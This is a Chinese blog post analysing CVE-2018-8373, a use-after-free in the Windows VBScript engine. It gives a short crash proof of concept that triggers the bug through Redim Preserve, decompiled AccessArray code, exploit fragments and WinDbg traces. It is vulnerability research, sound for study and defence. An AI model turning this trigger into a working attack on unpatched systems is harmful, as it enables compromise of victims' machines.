2. 程式人生 > >CVE-2018-8373初步分析

CVE-2018-8373初步分析

阿新 發佈:2018-12-20
導致crash的exp
Class MyClass
    Dim array()
    Private Sub Class_Initialize
           Redim array(2)
    End Sub
    Public Default Property Get P
           Redim Preserve array(1)      
    End Property
End Class
Set cls=New MyClass
cls.array(2)=cls

觸發點分析

最後這行程式碼cls.array(2)=cls會呼叫NameTbl::InvokeEx
逆向結果顯示,NameTbl::InvokeEx接著會呼叫AccessArray和AssignVar,其中stackFor_ecx為導致棧分配接著寫入的傳遞值=ecx也就是AssignVar的edx的暫存器,如圖1

struct IEntryPoint *__stdcall NameTbl::InvokeEx(NameTbl *this, int a2, unsigned int a3, int a4, struct tagDISPPARAMS *a5, struct tagVARIANT *a6, struct tagEXCEPINFO *a7, struct IServiceProvider *a8)
{
省略部分....
 else if ( ((_DWORD)v18->lpVtbl & 0xBFFF) == 8204 )
            {
              hr = (struct
 
 IEntryPoint *)AccessArray(
                                            (VAR *)v18,
                                            &stackFor_ecx,
                                            (struct VAR **)(v30 - 1),
                                            (struct VAR *)(*v29 + 16),
                                            0
 
,
                                            v42,
                                            v43);
              if ( (signed int)v13 >= 0 )
                  //stackFor_ecx也就是edx的暫存器
                hr = (struct IEntryPoint *)AssignVar(
                                              (int)stackFor_ecx,
                                              v45,
                                              (struct CSession *)&pvarg,
                                              v48,
                                              v42,
                                              (unsigned int)v43);
              VarList::~VarList((VarList *)&v54);
            }
....
}
HRESULT __userpurge [email protected]<eax>(VAR *[email protected]<edx>, _DWORD *stack@<ecx>, struct VAR **checkVar, struct VAR *varRef, int arrRetRef, struct VAR *a6, struct tagSAFEARRAY **a7)
{
  struct VAR *varPtrType; // eax
  SAFEARRAY *arrRet; // esi
  struct VAR **v9; // eax
  VAR *varNext; // ebx
  int dataSizeOffset; // edi
  struct VAR *vatType; // eax
  int varDimCount; // eax
  int DimSize; // eax
  int dataSize; // edi
  HRESULT result; // eax
  int v17; // ecx
  int v18; // ecx
  struct VAR *v19; // [esp+0h] [ebp-34h]
  const unsigned __int16 *v20; // [esp+4h] [ebp-30h]
  int RetVal; // [esp+18h] [ebp-1Ch]
  _DWORD *stackFor_ecx; // [esp+28h] [ebp-Ch]
  SAFEARRAYBOUND *rgsaboundRef; // [esp+2Ch] [ebp-8h]

  stackFor_ecx = stack;
  varPtrType = VAR::PvarCutAll(varFrom);
  // 如果是Array型別
  if ( *(_WORD *)varPtrType == 8204 )
  {
    arrRet = (SAFEARRAY *)*((_DWORD *)varPtrType + 2);
  }
  else
  {
    if ( *(_WORD *)varPtrType != 24588 )
      return -2147352571;
    arrRet = (SAFEARRAY *)**((_DWORD **)varPtrType + 2);
  }
  if ( !arrRet )
    return -2147352565;
  v9 = (struct VAR **)arrRet->cDims;
  if ( !(_WORD)v9 || v9 != checkVar )
    return -2147352565;
  result = SafeArrayLock(arrRet);
  if ( result >= 0 )
  {
    varNext = varRef;
    // 獲取第一個維度
    rgsaboundRef = arrRet->rgsabound;
    dataSizeOffset = 0;
    while ( 1 )
    {
      vatType = VAR::PvarCutAll(varNext);
      if ( *(_WORD *)vatType == 2 )
      {
        // 短整形
        varDimCount = *((signed __int16 *)vatType + 4);
      }
      else if ( *(_WORD *)vatType == 3 )
      {
        // 長整形
        varDimCount = *((_DWORD *)vatType + 2);
      }
      else
      {
        if ( rtVariantChangeTypeEx(
               (struct tagVARIANT *)0x400,
               (struct tagVARIANT *)2,
               3u,
               (unsigned __int16)v19,
               (unsigned __int16)v20) < 0 )
        {
          SafeArrayUnlock(arrRet);
          return CScriptRuntime::RecordHr(v18, v19, v20);
        }
        varDimCount = RetVal;
      }
      DimSize = varDimCount - rgsaboundRef->lLbound;
      // 如果維度大小長度大於維度的元素個數
      if ( DimSize < 0 || DimSize >= (signed int)rgsaboundRef->cElements )
      {
        SafeArrayUnlock(arrRet);
        return CScriptRuntime::RecordHr(v17, v19, v20);
      }
      // 當前維度元素大小
      dataSize = DimSize + dataSizeOffset;
      checkVar = (struct VAR **)((char *)checkVar - 1);
      if ( (signed int)checkVar <= 0 )
        break;
      ++rgsaboundRef;
      dataSizeOffset = rgsaboundRef->cElements * dataSize;
      varNext = (VAR *)((char *)varNext + 16);
    }
    result = SafeArrayUnlock(arrRet);
    if ( result >= 0 )
    {
      // 這裡datasize正好是0x10,stack是pvData區域的最後0x10空間
      *stackFor_ecx = (char *)arrRet->pvData + dataSize * arrRet->cbElements;
      if ( arrRetRef )
        *(_DWORD *)arrRetRef = arrRet;
      result = 0;
    }
  }
  return result;
}

關於UAF寫入位置我的理解是array()預設的長度是1,也就是是佔用0x10位置空間, 通過NameTbl::InvokeEx->AccessArray->AssignVar,因為預設長度是1,所以AccessArray的stackFor_ecx分配0x10之後後面的空間都是???,實際上僅僅是分配了0x10後面沒有更多的空間後續分配,在SafeArrayRedim又將array的pvData長度變為array(2)的大小也就是3個元素*0x10=0x30,從地址空間的佈局可以看出這個0x30空間最後0x10空間正好是0ceaeff0也就是array()預設的長度1個元素所佔用的空間,由於RedimPreserveArray把這個空間給釋放了,導致實際上釋放後可重用的空間還是最初AccessArray申請的array()預設的長度1個元素所佔用的空間,最後cls.array(2)=cls呼叫AssignVar也是往這個地址空間寫入資料,因為申請的棧的位置還是AccessArray這裡申請的stackFor_ecx->edi,導致崩潰,所以在8373後面的程式碼

Set cls = New MyClass
    array(2)=cls

//之後導致執行
            For i = 0 To UBound(array2,2)
                    array2(0,i) = 3
                    Next

這個3值首先往申請的棧寫入

For i = 0 To UBound(array)
                    array(i) = array2
                    Next

這裡只是array的pvData賦值成array2,僅僅是引用,array2的pvData在它直接pvData指標指向的地址所以為實際寫入array的pvData

Public Default Property Get P           
        P=&h0fffffff
        End Property

MyClass的p屬性需要往棧寫入值,通過AssignVar,所以導致array()預設的0x10空間在也就是RedimPreserveArray最後的0x10空間資料為3 和0fffffff

0:017> bp vbscript!RedimPreservearray
0:017> bp vbscript!AccessArray
0:017> bp vbscript!AssignVar
0:017> vbscript!AccessArray+0x1a2   
0:007> g
Breakpoint 2 hit
eax=0bec0efc ebx=0beb6fe0 ecx=0beb4f88 edx=0bec0efc esi=685bcbd4 edi=057fbd84
eip=685b2f7a esp=057fbd78 ebp=057fbd94 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
vbscript!AssignVar:
685b2f7a 8bff            mov     edi,edi
0:007> p
eax=0ceaeff0 ebx=00000002 ecx=057fb904 edx=00000002 esi=0c65afe8 edi=057fba48
eip=685c75c1 esp=057fb8b0 ebp=057fb8dc iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
//對於之前逆向結果的程式碼*stackFor_ecx = (char *)arrRet->pvData + dataSize * arrRet->cbElements;
vbscript!AccessArray+0xa2:
685c75c1 8b4510          mov     eax,dword ptr [ebp+10h] ss:0023:057fb8ec=00000000
0:007> dc ecx
//預設分配的空間地址指標
057fb904  0ceaeff0 057fb92c 00000001 0beb0fe8  ....,...........
057fb914  00000000 00000000 80020006 0beb4f88  .............O..
057fb924  0beb2fe0 0070af60 00000000 c0c0004a  ./..`.p.....J...
057fb934  c0c0c0c0 0bf3efe8 c0c0c0c0 057fb95c  ............\...
057fb944  696d58e3 0c964f98 057fb970 c0c0600c  .Xmi.O..p....`..
057fb954  c0c0c0c0 0bf46f90 0c65afe8 685d89ce  .....o....e...]h
057fb964  057fb9a4 685d9801 082d7fd0 00000003  ......]h..-.....
057fb974  00000409 00000004 057fb9f8 00000000  ................
//實際上僅僅是分配了0x10沒有多餘分配
0:007> dc  0ceaeff0
0ceaeff0  00000000 00000000 00000000 00000000  ................
0ceaf000  ???????? ???????? ???????? ????????  ????????????????
0ceaf010  ???????? ???????? ???????? ????????  ????????????????
0ceaf020  ???????? ???????? ???????? ????????  ????????????????
0ceaf030  ???????? ???????? ???????? ????????  ????????????????
0ceaf040  ???????? ???????? ???????? ????????  ????????????????
0ceaf050  ???????? ???????? ???????? ????????  ????????????????
0ceaf060  ???????? ???????? ???????? ????????  ????????????????
0:007> g
Breakpoint 0 hit
eax=0c65afe8 ebx=057fb4f8 ecx=0c65afe8 edx=00000001 esi=0bf46f84 edi=0bf16bf0
eip=685dd80c esp=057fb250 ebp=057fb48c iopl=0         nv up ei pl nz na po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200203
vbscript!RedimPreserveArray:
685dd80c 8bff            mov     edi,edi
0:007> dc 0c65afe8
//檢視陣列的長度是3
0c65afe8  08800001 00000010 00000000 0ceaefd0  ................
0c65aff8  00000003 00000000 ???????? ????????  ........????????
0c65b008  ???????? ???????? ???????? ????????  ????????????????
0c65b018  ???????? ???????? ???????? ????????  ????????????????
0c65b028  ???????? ???????? ???????? ????????  ????????????????
0c65b038  ???????? ???????? ???????? ????????  ????????????????
0c65b048  ???????? ???????? ???????? ????????  ????????????????
0c65b058  ???????? ???????? ???????? ????????  ????????????????
//pvData的空間被RedimPreserveArray撐大到0x30
0:007> dc  0ceaefd0
0ceaefd0  00000000 00000000 00000000 00000000  ................
0ceaefe0  00000000 00000000 00000000 00000000  ................
0ceaeff0  00000000 00000000 00000000 00000000  ................
0ceaf000  ???????? ???????? ???????? ????????  ????????????????
0ceaf010  ???????? ???????? ???????? ????????  ????????????????
0ceaf020  ???????? ???????? ???????? ????????  ????????????????
0ceaf030  ???????? ???????? ???????? ????????  ????????????????
0ceaf040  ???????? ???????? ???????? ????????  ????????????????
0:007> g
(f28.eb8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=0ceaeff0 ecx=0ceaeff0 edx=0008001f esi=0ceaeff0 edi=057fb8d0
eip=685b217e esp=057fb898 ebp=057fb8a8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210246
vbscript!VAR::Clear+0xe:
//導致實際上釋放後可重用的空間還是最初AccessArray申請的array()預設的長度1個元素所佔用的空間=0ceaeff0
685b217e 0fb703          movzx   eax,word ptr [ebx]       ds:0023:0ceaeff0=????

相關推薦

CVE-2018-8373初步分析

導致crash的exp Class MyClass Dim array() Private Sub Class_Initialize Redim array(2) End Sub Public Default Property G

【代碼審計】Spring Integration Zip不安全解壓(CVE-2018-1261)漏洞分析

圖片 ssa clas port als put gets 9.png after 1.漏洞相關信息 漏洞名稱:Spring Integration Zip不安全解壓 漏洞編號:CVE-2018-1261 漏洞描述:在spring-integration-zip.v1.0.

CVE-2018-8120 漏洞分析

CVE-2018-8120詳細分析漏洞描述 Microsoft Windows 7 SP1、Windows Server 2008 SP2和Windows Server 2008 R2 SP1都是美國微軟(Microsoft)公司的產品。Microsoft Windows 7 SP1是一套供個人電腦使用的操

曲速未來揭示 :新的CVE-2018-8373在野外發現漏洞利用

區塊鏈安全諮詢公司 曲速未來 訊息:在9月18日,也就是在Trend Micro研究人員釋出分析UAF漏洞CVE-2018-8373的文章後一個月,又發現了一個影響VBScript引擎的新版Windows版本的免費使用(UAF)漏洞CVE-2018-8373的細節,然後發現了另一個漏洞,也是在野外使

cve-2018-0802漏洞分析報告

軟體名稱:公式編輯器 軟體版本:2016以下 漏洞模組:EQNEDT32.EXE 模組版本:6.1.95.45 編譯日期:2000-11-9 作業系統:Windows XP/2003/7/8.1/10 漏洞編號:cve-2017-0802 危害等級:高危 漏洞型別:緩衝區溢位 威脅型別:遠端

CVE-2018-18888漏洞分析

CVE-2018-18888漏洞分析 本漏洞發現於PHP開源框架laravelCMS 其中 \app\Http\Controllers\Backend目錄下的ProfileController.php檔案中關於檔案上傳的過濾與限制部分原始碼如下 if ((($_FILES[

[漏洞分析]對CVE-2018-0802的分析

對CVE-2018-0802的分析 漏洞簡介 這個漏洞依然出現在微軟工具Equation Editor中的EQNEDT32.exe可執行程式。 漏洞分析環境與工具 漏洞分析環境:Window 7專業版(32位) 帶有漏洞的軟體:office 2003 sp3 工具:OllyD

weblogic之CVE-2018-3191漏洞分析

weblogic之CVE-2018-3191漏洞分析 理解這個漏洞首先需要看這篇文章:https://www.cnblogs.com/afanti/p/10193169.html 引用廖新喜說的,說白的就是反序列化時lookup中的引數可控,導致 JNDI注入 AbstractPlatformTra

CVE-2018-8897 調試分析

cve-2018-8897 漏洞說明 系統內核通過Mov到SS(stack segment)或Pop到SS指令進行堆棧切換操作後處理異常情況時發現了一個缺陷.在堆棧切換操作期間,處理器沒有傳送中斷和異常,而是在堆棧切換後面的第一條指令執行完傳送.一個沒有特權的系統用戶可以利用這個漏洞來破壞系統內核,導致拒

CVE-2018-4990 漏洞詳情分析

cve-2018-4990測試版本:AcroRdrDC1700920044_en_US 漏洞模塊: Escript.api 漏洞函數 修復函數 問題分析 拷貝對象的時候把DWORD類型的對象地址作為BYTE類型進行了拷貝,堆對象拷貝溢出漏洞。對象偏移在0x50的地方,也就是錯誤的位置。 Ja

WebLogic任意文件上傳漏洞復現與分析 -【CVE-2018-2894 】

安全 tar lan ide web htm 過濾 eval base CVE-2018-2894 漏洞影響版本:10.3.6.0, 12.1.3.0, 12.2.1.2, 12.2.1.3 下載地址:http://download.oracle.com/otn/nt/mi

CVE-2018-8120 分析

detect state cls ssid cda device cee 關鍵點 數據結構 提權:shellcode大部分是拷貝訪問令牌 token 原理: 拷貝進程pid為 4(這裏為 4)的token 到當前進程的EPROCESS 中的token實現提權漏洞的再次利用漏

Windows VBScript引擎遠端執行程式碼漏洞 CVE-2018-8174分析與利用

漏洞簡介   VBScript引擎處理記憶體中物件的方式中存在一個遠端執行程式碼漏洞。該漏洞可能以一種攻擊者可以在當前使用者的上下文中執行任意程式碼的方式來破壞記憶體。成功利用此漏洞的攻擊者可以獲得與當前使用者相同的使用者許可權。如果當前使用者使用管理使用者許可權登入,則成功利

CVE-2018-7600 Drupal漏洞原理的簡單分析與復現

0x00元件背景 Drupal是使用PHP語言編寫的開源內容管理框架(CMF),它由內容管理系統(CMS)和PHP開發框架(Framework)共同構成。連續多年榮獲全球最佳CMS大獎,是基於PHP語言最著名的WEB應用程式。 0x01漏洞位置 這裡有個call_user_func

漏洞分析CVE-2018-0802

漏洞分析之 CVE-2017-0802 目錄 漏洞分析之 CVE-2017-0802 目錄 ☛ 漏洞介紹 ☛ 漏洞分析 ☛ 1.漏洞分析環境與工具 ☛ 2.復現漏洞 ☛ 3.分析漏洞 ☛ 4.漏洞利用 完成時間:2018-10-24 21:26:54

weblogic系列漏洞整理————8、WebLogic 兩處任意檔案上傳漏洞動態分析CVE-2018-2894)

0x01 前言 CNCERT前幾天發公告稱發現Oracle公司出品的基於JavaEE結構的中介軟體WebLogic產品存在一個遠端上傳漏洞,並得到了廠商的確認,危害程度評分高達9.8分。鑑於廠商已進行了安全修復,筆者對該漏洞進行了一次分析。WebLogic管理端未授權的

CVE-2018-18888漏洞挖掘分析

CVE-2018-18888漏洞分析 其中 \app\Http\Controllers\Backend目錄下的ProfileController.php檔案中關於檔案上傳的過濾與限制部分原始碼如下 if ((($_FILES["avatar"]["type"] ==

CVE-2018-7600 Drupal核心遠端程式碼執行漏洞分析

    0x01 漏洞介紹 Drupal是一個開源內容管理系統(CMS),全球超過100萬個網站(包括政府,電子零售,企業組織,金融機構等)使用。兩週前,Drupal安全團隊披露了一個非常關鍵的漏洞,編號CVE-2018-7600 Drupal對錶單請求內容未做嚴格過濾,因此,這使得

Netatalk CVE-2018–1160 越界訪問漏洞分析

編譯安裝 首先下載帶有漏洞的原始碼 https://sourceforge.net/projects/netatalk/files/netatalk/3.1.11/ 安裝一些依賴庫(可能不全,到時根據報錯安裝其他的庫) sudo apt install libcrack2-dev sudo apt i

Struts2-057/CVE-2018-11776兩個版本RCE漏洞分析(含EXP)

0x01 前言 2018年8月22日,Apache Strust2釋出最新安全公告,Apache Struts2存在遠端程式碼執行的高危漏洞(S2-057/CVE-2018-11776),該漏洞由Semmle Security Research team的安全研究員Man YueMo發現。該漏洞是由於在St